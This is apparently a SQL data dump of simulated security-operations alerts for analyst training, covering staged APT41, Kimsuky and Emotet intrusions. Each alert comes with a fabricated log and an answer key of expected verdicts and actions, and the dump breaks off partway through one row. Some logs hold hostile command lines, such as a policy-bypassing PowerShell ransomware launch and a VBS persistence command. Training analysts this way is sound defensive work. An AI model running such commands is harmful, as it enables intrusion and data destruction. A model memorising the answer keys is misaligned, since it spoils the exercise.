(401, 'Unusual Data Access Patterns Detected', 'high', 'Data Loss Prevention (DLP)', 'Sensitive patient data and proprietary information from materials science research were accessed in a manner indicative of preparation for data exfiltration. The activity was detected originating from an internal network, accessing multiple sensitive files in quick succession, and communicating to an external IP address known for malicious activities.', 'Collection', 'T1119', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"dlp-collection-56789\",\"source_ip\":\"10.1.1.5\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"accessed_files\":[\"/research/patient_data/sensitive_data.xlsx\",\"/research/materials_science/proprietary_formula.docx\"],\"file_hashes\":[\"d41d8cd98f00b204e9800998ecf8427e\",\"5eb63bbbe01eeed093cb22bb8f5acdc3\"],\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"alert_reason\":\"Multiple sensitive files accessed and malware hash detected.\"}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"Employee of the company.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(402, 'Data Exfiltration Attempt Blocked', 'high', 'Firewall Logs', 'A detected attempt to transfer data to an external server was blocked. This represents the final stage of a sophisticated attack, indicating a potential breach.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:47:23Z\",\"firewall_id\":\"FW-12345\",\"action\":\"blocked\",\"source_ip\":\"10.0.15.23\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"policy_rule\":\"Block_Exfiltration_Attempts\",\"detection_method\":\"anomaly_detection\",\"alert_id\":\"alert-98765\",\"additional_info\":{\"attempted_bytes_transferred\":2048000,\"malware_family\":\"APT29\"}}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host attempting unauthorized data transfer.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file format detected in unauthorized transfer attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"User account involved in data exfiltration attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(403, 'Suspicious Email Attachment Detected', 'medium', 'Email Gateway Logs', 'A spear-phishing email was detected targeting key personnel at the think tank. The email contained a document with malicious macros aiming to gain initial access to the network.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.5\",\"email_subject\":\"Urgent: Update Required\",\"sender_email\":\"attackers@maliciousdomain.com\",\"recipient_email\":\"john.doe@thinktank.org\",\"attachment_name\":\"UpdateInstructions.docm\",\"attachment_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"malware_family\":\"Emotet\",\"user\":\"jdoe\"}', '2026-01-04 02:18:47', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Emotet campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attackers@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email domain associated with phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"UpdateInstructions.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"File contains macros linked to Emotet malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Emotet payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(404, 'Malicious Browser Extension Installed', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the attachment, a script executes silently in the background, installing a malicious browser extension designed to intercept email credentials.', 'Execution', 'T1059', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"4624\",\"computer_name\":\"user-pc.example.com\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.5\",\"malicious_file\":\"browser_harvest_ext.crx\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"script_name\":\"install_extension.js\",\"process_id\":4321,\"action\":\"extension_installed\",\"extension_id\":\"abcdef123456\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\"}', '2026-01-04 02:18:47', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with credential harvesting campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareHashDB\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malicious browser extensions.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"browser_harvest_ext.crx\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalEDR\",\"verdict\":\"suspicious\",\"details\":\"Detected as part of an unauthorized installation process.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(405, 'BabyShark VBS Script Execution', 'medium', 'System Event Logs', 'The BabyShark VBS script was executed to establish persistence on the compromised system. This script runs at startup, allowing attackers to maintain access over time.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"event_id\":\"7045\",\"timestamp\":\"2023-10-12T14:22:35Z\",\"computer_name\":\"compromised-host.local\",\"user\":\"SYSTEM\",\"action\":\"Service Installed\",\"service_name\":\"BabySharkVBS\",\"service_filename\":\"C:\\\\Windows\\\\System32\\\\BabyShark.vbs\",\"command_line\":\"wscript.exe C:\\\\Windows\\\\System32\\\\BabyShark.vbs\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"associated_user\":\"compromised_user\"}', '2026-01-04 02:18:47', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public IP Blacklist\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup\",\"verdict\":\"malicious\",\"details\":\"Hash matches known BabyShark VBS script.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account compromised as part of the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(406, 'Unauthorized Access to Internal Network', 'high', 'Network Traffic Analysis', 'An attacker was detected moving laterally within the internal network by exploiting compromised credentials. The attacker was observed accessing multiple internal systems, suggesting an attempt to identify sensitive data and further vulnerabilities.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"user\":\"jdoe\",\"action\":\"login_success\",\"protocol\":\"SMB\",\"file_accessed\":\"sensitive_data.xlsx\",\"hash\":\"3d2e4f8c5b9a4f4d9a7b0c9f1e2b3c4d\",\"event_id\":\"4624\",\"message\":\"User jdoe successfully logged in from 203.0.113.45 to 10.0.0.5 via SMB.\"}', '2026-01-04 02:18:47', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligenceDatabase\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalUserDatabase\",\"verdict\":\"internal\",\"details\":\"Compromised internal user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2e4f8c5b9a4f4d9a7b0c9f1e2b3c4d\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDatabase\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NULL', 1, 0, NULL),
(407, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Systems', 'The Kimsuky APT group has successfully exfiltrated sensitive emails and documents related to nuclear policy. They utilized a compromised browser extension to send data back to their command and control servers.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:52:23Z\",\"event_id\":\"EXFIL-2023-1001\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"johndoe\",\"exfiltrated_files\":[\"nuclear_policy_draft.docx\",\"email_correspondence_2023.eml\"],\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_extension_id\":\"kimsuky_extension_123\",\"c2_server\":\"malicious.kimsuky.org\"}', '2026-01-04 02:18:47', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known Kimsuky C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with Kimsuky malware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"nuclear_policy_draft.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Sensitive document\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"johndoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Affected user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(408, 'Initial Access via Supply Chain Compromise', 'high', 'Network Intrusion Detection System', 'APT41 has initiated an operation by exploiting a vulnerability in a third-party software update, gaining initial access to the targeted gaming company\'s network.', 'Supply Chain Attack', 'T1195.002 - Software Supply Chain', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:32Z\",\"event_id\":\"EVT-2023-20145\",\"source_ip\":\"198.51.100.14\",\"destination_ip\":\"10.0.5.25\",\"filename\":\"CCleaner_Update_v5.7.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert_name\":\"Suspicious Software Update\",\"user\":\"update_service\",\"description\":\"Detected a potentially malicious software update from a third-party provider.\"}', '2026-01-04 02:21:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous APT41 campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"CCleaner_Update_v5.7.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File associated with supply chain attacks targeting software updates.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware variant used by APT41.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(409, 'Execution of Backdoor Malware', 'high', 'Endpoint Detection and Response', 'After gaining initial access, APT41 executes a custom backdoor, allowing them to control compromised systems remotely. The malware deployment was detected via an anomaly in the execution patterns on a critical server.', 'Malware Deployment', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:01Z\",\"event_id\":\"EVT-2023-1023\",\"source_ip\":\"203.0.113.44\",\"destination_ip\":\"192.168.1.10\",\"user\":\"admin\",\"process_name\":\"svchost.exe\",\"malware_name\":\"APT41_Custom_Backdoor\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"backdoor.dll\",\"severity\":\"High\",\"action_taken\":\"Quarantine\"}', '2026-01-04 02:21:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT41 campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Critical server within the corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as known APT41 malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"malicious\",\"details\":\"Suspicious DLL associated with backdoor activities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(410, 'Establishing Persistence with Rootkit', 'high', 'Host-based Intrusion Prevention System', 'APT41 has installed a rootkit on a key server to ensure long-term access and resist detection. This activity is part of their advanced tactics to maintain persistent access within the network.', 'Persistence Mechanism', 'T1014 - Rootkit', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:46:23Z\",\"event_id\":\"HIPS-2023-5567\",\"host_ip\":\"192.168.1.10\",\"detected_action\":\"Rootkit Installation\",\"malware_name\":\"APT41_Rootkit\",\"file_path\":\"/usr/local/bin/apt41_rootkit\",\"file_hash\":\"3a5f1d7b8ee1b9c3c0a8a9c512345678\",\"attacker_ip\":\"203.0.113.45\",\"detected_by\":\"HIPS\",\"username\":\"sysadmin\",\"additional_info\":{\"rootkit_persistence\":true,\"kernel_modification\":true}}', '2026-01-04 02:21:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Confirmed malicious IP associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a5f1d7b8ee1b9c3c0a8a9c512345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known APT41 rootkit sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/usr/local/bin/apt41_rootkit\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Filename associated with APT41 rootkit persistence mechanism.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"sysadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account with elevated privileges.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(411, 'Lateral Movement to PII Databases', 'critical', 'Security Information and Event Management', 'APT41 has successfully utilized harvested credentials to move laterally within the network, specifically targeting databases containing PII.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:47Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"compromised_user\",\"action\":\"lateral_movement\",\"tool\":\"Mimikatz\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"mimilib.dll\",\"event_description\":\"Failed login attempt detected on database server with potential credential dumping activity.\",\"additional_info\":{\"failed_logins\":5,\"successful_logins\":1,\"target_database\":\"PII_DB_01\"}}', '2026-01-04 02:21:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal database server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory Logs\",\"verdict\":\"suspicious\",\"details\":\"Account recently accessed from multiple foreign IPs.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz tool.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"mimilib.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File used by Mimikatz for credential dumping.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(412, 'Exfiltration of Game Source Code and PII', 'critical', 'Data Loss Prevention', 'APT41 successfully exfiltrated sensitive game source code and PII. This marks the completion of their dual-mode operation focused on both commercial and strategic gains.', 'Data Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:32:00Z\",\"event_id\":\"EXFIL-2023-5276\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.15\",\"action\":\"ALLOW\",\"protocol\":\"HTTPS\",\"file_name\":\"game_source_code_v1.0.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"url\":\"https://malicious-domain.com/upload\",\"data_volume\":\"15GB\",\"comments\":\"Data exfiltration detected via secured channel; source code and PII files identified.\"}', '2026-01-04 02:21:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Malicious file associated with APT41 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://malicious-domain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"URL associated with data exfiltration activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"game_source_code_v1.0.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"malicious\",\"details\":\"Exfiltrated file containing sensitive game source code.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(413, 'Supply Chain Compromise Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'Anomalous network activity detected indicating a potential supply chain compromise. The malicious code was inserted into a popular software update by APT41, exploiting the company\'s reliance on the software to gain a foothold in the network.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"update_v1.23.4.exe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"alert_id\":\"NIDS-20231015-0001\"}', '2026-01-04 04:11:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Corporate workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious software update used in supply chain attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"update_v1.23.4.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"Filename associated with malicious software update distribution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(414, 'Suspicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'After gaining access, the attackers deployed a suspicious script to execute a ransomware payload, aiming to encrypt critical business data and demand a ransom. The script was detected running on a critical server.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"edr-20231015-0001\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"username\":\"j.doe\",\"script_name\":\"encryptor_v2.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"process_id\":4521,\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\j.doe\\\\Desktop\\\\encryptor_v2.ps1\",\"detected_by\":\"EDR\",\"external_ip\":\"203.0.113.45\",\"malware_family\":\"APT41\"}', '2026-01-04 04:11:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41 activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as part of a ransomware payload\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encryptor_v2.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Database\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized script executed on high-value server\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User 